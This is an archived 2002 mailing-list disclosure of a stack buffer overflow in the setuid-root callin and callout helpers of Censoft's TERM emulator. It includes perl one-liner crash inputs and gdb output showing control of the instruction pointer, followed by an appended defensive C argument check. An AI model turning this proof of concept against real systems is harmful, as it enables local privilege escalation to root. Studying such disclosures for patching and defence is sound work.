Censoft TERM Emu bOf

From: KF (dotslash@snosoft.com)
Date: 02/22/02


Date: Fri, 22 Feb 2002 13:16:18 -0500
From: KF <dotslash@snosoft.com>
To: vuln-dev@security-focus.com

Vendor: www.censoft.com

Product: TERM for UNIX / Linux
Emulations Wyse 60, SCO ANSI, VT220 Terminal
Supports SCO, AIX, HP, DEC, Solaris Operating Environment[tm] software, and Linux[tm]

I WAS going to purchase this product after trying the eval; however, I changed my mind for some reason... I would imagine the full product is also vulnerable.

[elguapo@linux elguapo]$ ftp ftp.censoft.com
Connected to ftp.censoft.com.
220 ns.centurysoftware.com FTP server (Version 6.00) ready.
Name (ftp.censoft.com:elguapo): anonymous
331 Guest login ok, send your email address as password.
Password:
230- Welcome To Century Software Ftp Server.
230-
230- Here you will find all the Century Software
230- Products.
230-
...
ftp> cd download/windows/linux
250 CWD command successful.
ftp> get termlx.tar
local: termlx.tar remote: termlx.tar
200 PORT command successful.
150 Opening BINARY mode data connection for 'termlx.tar' (931840 bytes).
226 Transfer complete.

As you can see, the .tar file has some suid root stuff to play with:
[elguapo@linux elguapo]$ tar tvf termlx.tar
-rwxr-xr-x root/root 630976 2000-04-01 02:00:00 term
-rwsr-xr-x root/root 96988 1999-03-22 23:52:10 callin
-rwsr-xr-x root/root 97144 1999-03-22 23:52:11 callout
-rwxr-xr-x root/root 94484 1999-03-22 23:52:10 brand

Apparently I don't play nice:
[elguapo@linux elguapo]$ /home/elguapo/Censoft/callin `perl -e 'print "A" x 9000'`
Arguments must be of form ttyNN
[elguapo@linux elguapo]$ /home/elguapo/Censoft/callin tty`perl -e 'print "A" x 9000'`
Segmentation fault (core dumped)

rm /etc/LCK..inittab if you need to try again, or you will get the following message:
Non-expired lockfile: /etc/LCK..inittab

Let's check the stack out a bit.
[root@linux /root]# gdb /home/elguapo/Censoft/callin core
GNU gdb 5.0mdk-11mdk Linux-Mandrake 8.0
Core was generated by `BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB'.
Program terminated with signal 11, Segmentation fault.
#0 0x42424242 in ?? ()
(gdb) i r
eax 0xffffffff -1
ecx 0xbfffd3a4 -1073753180
edx 0x1 1
ebx 0x805fdf0 134610416
esp 0xbfffd3ec 0xbfffd3ec
ebp 0x42424242 0x42424242
esi 0xbfffd400 -1073753088
edi 0xbfffd858 -1073751976
eip 0x42424242 0x42424242

The callout binary is also affected.
[root@linux /root]# /home/elguapo/Censoft/callout tty`perl -e 'print "B" x 9000'`
Segmentation fault (core dumped)

[root@linux /root]# gdb /home/elguapo/Censoft/callout core
GNU gdb 5.0mdk-11mdk Linux-Mandrake 8.0
Core was generated by `BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB'.
Program terminated with signal 11, Segmentation fault.
#0 0x42424242 in ?? ()
(gdb) i r
eax 0xffffffff -1
ecx 0xbfffd3a4 -1073753180
edx 0x1 1
ebx 0x805fe88 134610568
esp 0xbfffd3ec 0xbfffd3ec
ebp 0x42424242 0x42424242
esi 0xbfffd400 -1073753088
edi 0xbfffd856 -1073751978
eip 0x42424242 0x42424242

-KF
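Added illustration, not Censoft's code (the source of callin/callout is not available): the bounded "ttyNN" argument check a setuid helper should perform before the name reaches any fixed-size buffer. The unchecked copy it stands in for is an assumption drawn from the 0x42424242 frame above; TTY_NAME_MAX and the function names are hypothetical.

```c
/* Hypothetical bounded parser for a "ttyNN" argument; the unchecked
 * strcpy it replaces is inferred from the crash, not taken from the vendor. */
#include <ctype.h>
#include <stdlib.h>
#include <string.h>
#define TTY_NAME_MAX 15   /* longest device name accepted, e.g. "ttyS0" */

/* Return 0 and write the NUL-terminated name to out when arg is "tty"
 * followed by 1..12 alphanumeric characters; return -1 otherwise. Length
 * and character set are checked before anything is copied, so a 9000-byte
 * argument is rejected instead of walking off the end of out. */
int parse_tty_arg(const char *arg, char *out, size_t outlen)
{
    size_t i;
    if (arg == NULL || out == NULL || outlen < TTY_NAME_MAX + 1)
        return -1;
    if (strncmp(arg, "tty", 3) != 0)
        return -1;                 /* "Arguments must be of form ttyNN" */
    for (i = 3; arg[i] != '\0'; i++) {
        if (i >= TTY_NAME_MAX)
            return -1;             /* too long: reject, never copy */
        if (!isalnum((unsigned char)arg[i]))
            return -1;             /* no '/', '.', '-' or spaces */
    }
    if (i == 3)
        return -1;                 /* bare "tty" has no unit number */
    memcpy(out, arg, i);
    out[i] = '\0';
    return 0;
}

/* 1 if arg passes the check, 0 if it is rejected. */
int tty_arg_accepted(const char *arg)
{
    char name[TTY_NAME_MAX + 1];
    return parse_tty_arg(arg, name, sizeof name) == 0;
}

/* Constructed input in the spirit of the post: "tty" + n bytes of 'A'.
 * Returns 1 if accepted, 0 if rejected, -1 on allocation failure. */
int long_tty_arg_accepted(size_t n)
{
    char *arg = malloc(n + 4);
    int accepted;
    if (arg == NULL) return -1;
    memcpy(arg, "tty", 3);
    memset(arg + 3, 'A', n);
    arg[n + 3] = '\0';
    accepted = tty_arg_accepted(arg);
    free(arg);
    return accepted;
}
```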